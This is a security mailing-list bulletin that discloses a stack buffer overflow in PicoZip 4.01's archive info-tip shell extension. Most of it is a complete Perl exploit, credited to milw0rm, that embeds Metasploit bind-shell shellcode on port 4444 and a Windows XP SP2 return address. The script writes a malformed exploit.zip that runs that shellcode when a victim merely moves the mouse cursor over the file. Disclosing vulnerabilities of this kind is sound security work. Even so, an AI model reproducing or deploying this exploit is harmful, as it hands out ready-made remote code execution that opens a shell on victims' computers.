[EXPL] PicoZip Long Filename Buffer Overflow (Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



PicoZip Long Filename Buffer Overflow (Exploit)
------------------------------------------------------------------------


SUMMARY

"Acubix <http://www.picozip.com/> PicoZip is an award winning file
compression utility for Microsoft Windows users. Its intuitive user
interface is extremely easy to use, while its wide ranging support for
most file compression formats and comprehensive feature set makes PicoZip
the only archive utility you will ever need."

A stack based buffer overflow vulnerability in PicoZip allows execution of
arbitrary code when a user moves his cursor over a malicious archive.

DETAILS

Vulnerable Systems:
* PicoZip version 4.01

Immune Systems:
* PicoZip version 4.02

Exploit:
#!/usr/bin/perl
# Pico Zip v. 4.01 Long Filename Buffer Overflow
# Original advisory -
http://www.securityfocus.com/archive/1/437103/30/30/threaded
# Author - c0rrupt
# Greets - sh0uts to n0limit, muts, and brax for the music ;)
#
# The vulnerability is caused due to a boundary error within the
# "zipinfo.dll" info tip shell extension when reading a ACE, RAR, or
# ZIP archive that contains a file with an overly long filename. This
# can be exploited to cause a stack-based buffer overflow when the user
# moves the mouse cursor over a malicious archive either in Windows
# Explorer or from any program that uses the file-open dialog box.
#
# Running this script will generate a malformed zip file that will execute
# the given shellcode when a user moves his cursor over the file.
# (This exploit bypasses stack protection and DEP)

$offset = "\x6F\xE2\xD7\x5A"; #Windows XP SP2 English

# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
http://metasploit.com
$shellcode =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa3".
"\x52\xaa\x9a\x83\xeb\xfc\xe2\xf4\x5f\x38\x41\xd7\x4b\xab\x55\x65".
"\x5c\x32\x21\xf6\x87\x76\x21\xdf\x9f\xd9\xd6\x9f\xdb\x53\x45\x11".
"\xec\x4a\x21\xc5\x83\x53\x41\xd3\x28\x66\x21\x9b\x4d\x63\x6a\x03".
"\x0f\xd6\x6a\xee\xa4\x93\x60\x97\xa2\x90\x41\x6e\x98\x06\x8e\xb2".
"\xd6\xb7\x21\xc5\x87\x53\x41\xfc\x28\x5e\xe1\x11\xfc\x4e\xab\x71".
"\xa0\x7e\x21\x13\xcf\x76\xb6\xfb\x60\x63\x71\xfe\x28\x11\x9a\x11".
"\xe3\x5e\x21\xea\xbf\xff\x21\xda\xab\x0c\xc2\x14\xed\x5c\x46\xca".
"\x5c\x84\xcc\xc9\xc5\x3a\x99\xa8\xcb\x25\xd9\xa8\xfc\x06\x55\x4a".
"\xcb\x99\x47\x66\x98\x02\x55\x4c\xfc\xdb\x4f\xfc\x22\xbf\xa2\x98".
"\xf6\x38\xa8\x65\x73\x3a\x73\x93\x56\xff\xfd\x65\x75\x01\xf9\xc9".
"\xf0\x01\xe9\xc9\xe0\x01\x55\x4a\xc5\x3a\xbb\xc6\xc5\x01\x23\x7b".
"\x36\x3a\x0e\x80\xd3\x95\xfd\x65\x75\x38\xba\xcb\xf6\xad\x7a\xf2".
"\x07\xff\x84\x73\xf4\xad\x7c\xc9\xf6\xad\x7a\xf2\x46\x1b\x2c\xd3".
"\xf4\xad\x7c\xca\xf7\x06\xff\x65\x73\xc1\xc2\x7d\xda\x94\xd3\xcd".
"\x5c\x84\xff\x65\x73\x34\xc0\xfe\xc5\x3a\xc9\xf7\x2a\xb7\xc0\xca".
"\xfa\x7b\x66\x13\x44\x38\xee\x13\x41\x63\x6a\x69\x09\xac\xe8\xb7".
"\x5d\x10\x86\x09\x2e\x28\x92\x31\x08\xf9\xc2\xe8\x5d\xe1\xbc\x65".
"\xd6\x16\x55\x4c\xf8\x05\xf8\xcb\xf2\x03\xc0\x9b\xf2\x03\xff\xcb".
"\x5c\x82\xc2\x37\x7a\x57\x64\xc9\x5c\x84\xc0\x65\x5c\x65\x55\x4a".
"\x28\x05\x56\x19\x67\x36\x55\x4c\xf1\xad\x7a\xf2\x53\xd8\xae\xc5".
"\xf0\xad\x7c\x65\x73\x52\xaa\x9a";



$filename = $shellcode . "A"x(524-length($shellcode)) . $offset;


$head = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00".
"\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x14\x02\x00\x00";

$middle = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00".
"\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x14\x02\x00\x00\x00\x00\x00\x00".
"\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00";

$tail = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00".
"\x00\x00\x01\x00\x01\x00\x42\x02\x00\x00".
"\x32\x02\x00\x00\x00\x00";

$evilzip = $head . $filename . $middle . $filename . $tail;

open(ZIPFILE,">exploit.zip")|| die "cannot open output file";
print(ZIPFILE $evilzip) || die "cannot write to output file";
close(ZIPFILE);


ADDITIONAL INFORMATION

The information has been provided by milw0rm.
The original article can be found at:
<http://www.milw0rm.com/exploits/1917>
http://www.milw0rm.com/exploits/1917



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [EXPL] Monop Local Vulnerability Exploit Code Released
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... users to gain the privileges of the other players also playing the game. ... Second player's name buffer overflow. ...
    (Securiteam)
  • [NT] Lhaplus LHA Extended Header Handling Buffer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lhaplus LHA Extended Header Handling Buffer Overflow ... A vulnerability has been found in Lhaplus. ... This advisory discloses a buffer overflow vulnerability in Lhaplus. ...
    (Securiteam)
  • [NEWS] 0verkill Buffer Overflow Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... $HOME environment variable demonstrates the buffer overflow, ... GNU gdb 5.0 ... vulnerability or to otherwise crash the program. ...
    (Securiteam)
  • [EXPL] Microsoft Windows XVoice.dll and Xlisten.dll Buffer Overflow (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... An exploitable buffer overflow in Microsoft Windows' DirectSpeechSynthesis ... arbitrary code by overflowing the ModeName parameter of the ActiveX. ... Microsoft Windows DirectSpeechSynthesis Module ...
    (Securiteam)
  • [NT] CA ARCServe Backup for Laptops and Desktops Multiple Buffer Overflow Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... CA ARCServe Backup for Laptops and Desktops Multiple Buffer Overflow ... Remote exploitation of multiple buffer overflow vulnerabilities in ... rxsGetSubDirs, rxsGetServerDBPathName, rxsSetServerOptions, rxsDeleteFile, ...
    (Securiteam)